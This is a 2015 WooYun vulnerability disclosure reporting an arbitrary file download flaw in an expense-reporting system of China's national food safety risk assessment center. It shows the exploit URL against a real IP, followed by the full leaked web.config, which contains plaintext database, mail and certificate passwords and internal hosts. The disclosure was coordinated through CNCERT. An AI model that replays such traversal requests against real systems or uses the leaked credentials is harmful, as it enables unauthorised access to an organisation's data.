当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098548

漏洞标题:国家食品安全风险评估中心某系统任意文件下载

相关厂商:国家互联网应急中心

漏洞作者: bitcoin

提交时间:2015-02-27 14:09

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

任意文件下载

详细说明:

国家食品安全风险评估中心网络报销系统
http://114.247.147.253/DownLoadPage.aspx?FileName=/web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
	<configSections>
		<sectionGroup name="system.web.extensions" type="System.Web.Configuration.SystemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
			<sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
				<section name="scriptResourceHandler" type="System.Web.Configuration.ScriptingScriptResourceHandlerSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication" />
				<sectionGroup name="webServices" type="System.Web.Configuration.ScriptingWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35">
					<section name="jsonSerialization" type="System.Web.Configuration.ScriptingJsonSerializationSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="Everywhere" />
					<section name="profileService" type="System.Web.Configuration.ScriptingProfileServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication" />
					<section name="authenticationService" type="System.Web.Configuration.ScriptingAuthenticationServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication" />
					<section name="roleService" type="System.Web.Configuration.ScriptingRoleServiceSection, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" allowDefinition="MachineToApplication" />
				</sectionGroup>
			</sectionGroup> 
		</sectionGroup>
	</configSections>
	<connectionStrings>  
		<add name="SaaSConnectionString" connectionString="Data Source=192.168.0.200;Initial Catalog=SaaS_CP0003;Persist Security Info=True;User ID=sa;Password=123" providerName="System.Data.SqlClient" />
	</connectionStrings>
	<appSettings>
		<add key="ElongAirWebService" value="http://flight.test.elong.com/web_service/" />
		<add key="ElongHotelWebService" value="http://211.151.230.209/newNorthBoundService/" />
		<add key="SysActionLog" value="N" />
		<add key="SysOnOffLog" value="N" />
		<add key="SSC" value="N" />  
		<add key="SSC_DATARIGHT" value="1" />
		<add key="SSC_ONOFFLOG" value="Y" />
		<add key="SSC_ACTIONLOG" value="N" />
		<add key="SSC-IMAGE" value="N" />
		<add key="SSC-EMAIL" value="ssc@acsoft.com.cn" />
		<add key="SSC-SMTP" value="mail.acsoft.com.cn" />
		<add key="SSC-PWD" value="ssc-acsoft" />
		<add key="SSC-EMAILNAME" value="ssc@acsoft.com.cn" />
		<add key="OA" value="N" />
		<add key="NGConnString" value="Provider=SQLOLEDB.1;Password=;Persist Security Info=True;User ID=sa;Initial CATALOG=dbname;Data Source=servername" />
		<add key="DefalutLanguage" value="GB" />
		<add key="SITE" value="S0001" />
		<add key="GlobalConnectionString" value="Data Source=.;Initial Catalog=Food;User ID=sa;Password=foodsa" />
		<add key="CrystalImageCleaner-AutoStart" value="true" />
		<add key="CrystalImageCleaner-Sleep" value="60000" />
		<add key="CrystalImageCleaner-Age" value="120000" />
		<add key="FCKeditor:BasePath" value="/fckeditor/" />
		<add key="FCKeditor:UserFilesPath" value="/fckeditor/Files/" />
		<add key="CA-UserKey-Path" value="C:\userkey.key" />
		<add key="CA-UserCert-Path" value="C:\UserCert.der" />
		<add key="CA-CertChair-Path" value="C:\CertChain.spc" />
		<add key="CA-Password" value="sheca" />
		<add key="Version" value="basic" />
		<add key="TCCard_Service" value="http://127.0.0.1:89/Service.asmx?wsdl" />
	<add key="TCCard_Service.Service" value="http://127.0.0.1:89/Service.asmx" />
	</appSettings>
	<system.web>
		<sessionState mode="StateServer" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="30" />
		<compilation debug="true" defaultLanguage="c#">
			<assemblies>
				<add assembly="System.Transactions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
				<add assembly="System.Design, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
				<add assembly="System.Management, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
				<add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
				<add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
				<add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
				<add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
				<add assembly="Microsoft.ReportViewer.WebForms, Version=9.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
			
				<add assembly="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
			</assemblies>
			<buildProviders>
				<add extension=".rdlc" type="Microsoft.Reporting.RdlBuildProvider, Microsoft.ReportViewer.Common, Version=9.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
			</buildProviders>
		</compilation>
		<httpHandlers>
			<remove path="*.asmx" verb="*" />
			<add path="*.asmx" verb="*" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" validate="false" />
			<add path="*_AppService.axd" verb="*" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" validate="false" />
			<add path="ScriptResource.axd" verb="GET,HEAD" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" validate="false" />
			<add path="Reserved.ReportViewerWebControl.axd" verb="*" type="Microsoft.Reporting.WebForms.HttpHandler, Microsoft.ReportViewer.WebForms, Version=9.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" validate="false" />
		</httpHandlers>   
		<authentication mode="Windows" />
		<authorization>
			<allow users="*" />
		</authorization>
		<customErrors mode="Off" defaultRedirect="ErrorPages.aspx" />
		<identity impersonate="false" />
		<globalization requestEncoding="utf-8" responseEncoding="utf-8" />
		<pages validateRequest="false">
			<controls>
				<add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
				<add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
			</controls>
		</pages>
		<httpModules>
			<add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
		</httpModules>
		<webServices>
			<protocols>
				<add name="HttpPost" />
				<add name="HttpGet" />
			</protocols>
		</webServices>
	</system.web>
	<system.codedom>
		<compilers>
			<compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CSharp.CSharpCodeProvider,System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" warningLevel="4">
				<providerOption name="CompilerVersion" value="v3.5" />
				<providerOption name="WarnAsError" value="false" />
			</compiler>
			<compiler language="vb;vbs;visualbasic;vbscript" extension=".vb" type="Microsoft.VisualBasic.VBCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" warningLevel="4">
				<providerOption name="CompilerVersion" value="v3.5" />
				<providerOption name="OptionInfer" value="true" />
				<providerOption name="WarnAsError" value="false" />
			</compiler>
		</compilers>
	</system.codedom>
	<system.webServer>
		<validation validateIntegratedModeConfiguration="false" />
		<modules>
			<remove name="ScriptModule" />
			<add name="ScriptModule" preCondition="managedHandler" type="System.Web.Handlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
		</modules>
		<handlers>
			<remove name="WebServiceHandlerFactory-Integrated" />
			<remove name="ScriptHandlerFactory" />
			<remove name="ScriptHandlerFactoryAppServices" />
			<remove name="ScriptResource" />
			<add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
			<add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.axd" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
			<add name="ScriptResource" verb="GET,HEAD" path="ScriptResource.axd" preCondition="integratedMode" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
		</handlers>
        <defaultDocument>
            <files>
                <clear />
                <add value="default.aspx" />
                <add value="Default.htm" />
                <add value="Default.asp" />
                <add value="index.htm" />
                <add value="index.html" />
                <add value="iisstart.htm" />
            </files>
        </defaultDocument>
	</system.webServer>
	<runtime>
		<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
			<dependentAssembly>
				<assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856ad364e35" />
				<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0" />
			</dependentAssembly>
			<dependentAssembly>
				<assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31bf3856ad364e35" />
				<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0" />
			</dependentAssembly>
		</assemblyBinding>
	</runtime>
	<location path="System/DataImportExcel.aspx">
		<system.web>
			<globalization fileEncoding="gb2312" requestEncoding="gb2312" responseEncoding="gb2312" />
		</system.web>
	</location>
	<location path="System/DataImportPage.aspx">
		<system.web>
			<globalization fileEncoding="gb2312" requestEncoding="gb2312" responseEncoding="gb2312" />
		</system.web>
	</location>
	<location path="DownLoadPage.aspx">
		<system.web>
			<globalization fileEncoding="gb2312" requestEncoding="gb2312" responseEncoding="gb2312" />
		</system.web>
	</location>
	<system.serviceModel>
		<bindings />
		<client />
	</system.serviceModel>
</configuration>

漏洞证明:

如上

修复方案:

控制权限

版权声明:转载请注明来源 bitcoin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-04 08:57

厂商回复:

CNVD确认所述情况,已经由CNCERT转相关部门通报。

最新状态:

暂无